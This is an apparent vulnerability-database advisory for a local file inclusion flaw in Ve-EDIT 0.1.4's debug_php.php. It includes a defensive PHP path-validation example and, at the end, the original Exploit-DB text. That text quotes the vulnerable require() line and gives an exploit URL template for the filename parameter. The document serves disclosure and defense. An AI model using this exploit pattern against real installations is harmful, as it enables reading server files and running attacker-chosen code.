vendor: Ve-EDIT
by: CoBRa_21
CVSS: 9,3 HIGH
Local File Inclusion (LFI)
CWE: 98
Product Name: Ve-EDIT
Affected Version From: 0.1.4
Affected Version To: 0.1.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpwebeditor:ve-edit:0.1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability

Ve-EDIT v 0.1.4 contains a local file inclusion vulnerability in the 'debug_php.php' script: the 'filename' parameter is passed to require() without validation, which allows an attacker to include a local file. This can be exploited to execute arbitrary PHP code by including files from local resources.

Mitigation:

The vendor has released a patch to address this vulnerability.
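
One way to harden the include that the advisory quotes (`require("./../".$_GET["filename"]);`), as an added example that is not the vendor's patch or Ve-EDIT code. The function name `resolve_debug_target`, the allowlist and the demo files are assumptions made for illustration.

```php
<?php
// Added example, not Ve-EDIT code. Vulnerable pattern quoted in the advisory:
//   require("./../" . $_GET["filename"]);
// resolve_debug_target() and the allowlist below are hypothetical.

/** Return the absolute path that may be included, or null to reject. */
function resolve_debug_target(string $baseDir, string $requested, array $allowed): ?string
{
    // 1. Reject empty names and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // 2. Allowlist: only names the application itself registered.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 3. Canonicalise (resolves ".." and symlinks) and require the result to
    //    stay inside the base directory, even if an allowlisted name is a symlink.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

// Constructed demo: a throwaway directory holding one permitted script.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'veedit_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'page.php', "<?php echo 'ok';\n");

$allowed = ['page.php', 'missing.php'];   // constructed allowlist
$inputs  = ['page.php', '../outside.php', 'missing.php', "page.php\0.txt"];
foreach ($inputs as $name) {
    $path  = resolve_debug_target($base, $name, $allowed);
    $label = json_encode($name, JSON_UNESCAPED_SLASHES);
    printf("%-24s %s\n", $label, $path === null ? 'rejected' : 'ok: ' . basename($path));
}

// Clean up the constructed files.
unlink($base . DIRECTORY_SEPARATOR . 'page.php');
rmdir($base);
```

In a request handler, `require` is called only on a non-null return value; any other request gets an error response without touching the filesystem path the client supplied.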
Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/phpwebeditor/
 
-------------------------------------------------------------------------------------
 
EXPLOIT:
 
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFI]
 
-------------------------------------------------------------------------------------
 
BUG
Line 53:        require("./../".$_GET["filename"]); 
 
-------------------------------------------------------------------------------------

# milw0rm.com [2009-09-01]